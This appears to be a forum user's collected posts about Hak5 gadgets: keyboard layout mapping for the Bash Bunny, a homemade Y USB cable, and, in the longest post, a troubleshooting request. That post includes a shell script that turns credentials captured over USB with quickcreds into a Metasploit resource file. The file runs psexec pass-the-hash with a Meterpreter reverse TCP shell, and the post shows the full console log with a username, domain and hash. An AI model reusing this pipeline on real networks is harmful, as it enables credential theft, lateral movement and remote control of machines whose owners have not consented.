Maestropastelero


  1. GhostGuy9, this sounds pretty interesting to me. Do you mind sharing your code, or at least pointing me in the right direction to accomplish that? Thanks
  2. Hi Semefi, I am from Chile, but we use the same key mapping. It would be really helpful if you could share your mapping config with me; even if you still have some character issues, that's better than the current es-la config file on the wiki. Thanks
  3. This is not a 100% BashBunny topic, but it is related and I think all the newbies like me could be interested.

     I've used Metasploit on a Kali laptop with a post mimikatz module loaded and dumped NTLMv2 hashes fine. It takes a Superuser account hash and uses exploit/windows/smb/psexec for accessing other computers on the same network. Then I realized I could set up msf on my BB.

     Running V1.3 on my BB, I set up Metasploit following this guide: https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros

     At first it melted my brain, as it didn't work and I am not super skilled in these matters, but after some Gems uninstall/install/downgrade I finally made it work.

     Then I used the quickcreds payload for getting the hashes through the USB, and when that is done, I build an RC file that is passed to msfconsole -r. So far so good. Metasploit takes like 1 minute to load, but it works.

     The problem is that when it tries to exploit, I always get Login Error : execution expired

     The main question is: are the hashes from hashdump somehow different from the hashes that quickcreds provides? (I hope that doesn't sound too newbie.) Or does anyone see anything bad in what I am doing here?

     This is the log I got from Metasploit:

         =[ metasploit v4.15.7-dev-70a82b5 ]
         + -- --=[ 1674 exploits - 960 auxiliary - 295 post ]
         + -- --=[ 489 payloads - 40 encoders - 9 nops ]
         + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
         [*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives.
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp
         payload => windows/meterpreter/reverse_tcp
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1
         LHOST => 172.16.64.1
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443
         LPORT => 443
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10
         RHOST => 172.16.64.10
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername
         SMBUser => myusername
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
         SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN
         SMBDomain => OFFICEDOMAIN
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j
         [*] Exploit running as background job.
         resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20
         [*] Started reverse TCP handler on 172.16.64.1:443
         [*] 172.16.64.10:445 - Connecting to the server...
         [*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'...
         [-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

     ---------------------------------------------------------------------------------------------------

     This is what I added to the payload to test it (ugly code, it is just a test):

         echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt
         echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt
         echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt
         echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt
         echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt
         head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
         head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
         head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
         echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt
         export HOME=/root
         source /etc/profile.d/rvm.sh
         cd /root/metasploit-framework/
         ./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log
  4. Anyone? Just a little help to understand the mapping? :)
  5. Can someone please give me a hand with the keyboard layout? It is impossible to get any payload to work with this one.

     In my country we use the ES-LA layout (Spanish, Latin), and every time the BB sends a \ the computer gets:

     - " if I use the ES language setting.
     - } if I use the US one.
     - And nothing happens (or at least it doesn't send any QUACK command) if I set the recently added ES-LA (https://raw.githubusercontent.com/hak5/bashbunny-payloads/master/languages/es-la.json).

     To add the language I am adding the raw json file into D:\languages\ and modifying the config.txt file to use it.

     Here is an example output for running something under Windows:

         RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\file.cmd')"

     turns into

         powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads"switch2"file.cmd')

     As you can see, it prints " instead of \

     This is the layout for every ES-LA keyboard, but I can't figure out how to do the mapping. I'll appreciate any help on this.
  6. Finally I made the cable, just 1 female and 2 males. I removed the rubber from the 2 power cables in the middle section and attached a second male USB cable (soldered the red and black ones), added some tape strips, and everything seems to work fine. I would prefer to have a new cable rather than this, but in the meantime I am going to use it for some weeks as it works just fine. Thanks, Matias.
  7. Maybe I didn't explain enough that I live outside the US, and there is no Amazon here. Or you just didn't read the whole post, where I wrote that Amazon doesn't sell USB cables like this one overseas (I already tried all the ones that say power enhanced). The only way to buy it online and ship it down here (Chile) is to add at least 40 bucks to have it delivered within 20 days. So it is not the best option at this point. Just wondering if someone knows the internal structure of this Y USB cable so I can just build one while waiting until a new one arrives.
  8. I just got a second-hand Nano from eBay and it didn't come with any cable or instructions, just the Nano and antennas (so lame, I know, but it came in a bundle with something else I needed). I haven't even powered it yet, but from Google pictures I saw the Y cable should be like female USB A to 2x male USB A. I started looking on the local market but haven't found any in my country yet, and Amazon doesn't ship them outside the US either. I will figure out where to buy it, but in the meantime, what do you think about building it to start using the Nano? This video shows 1 USB extension split and joined again by colors, and then an extra USB male cable added, connecting only the power color cables. Thoughts?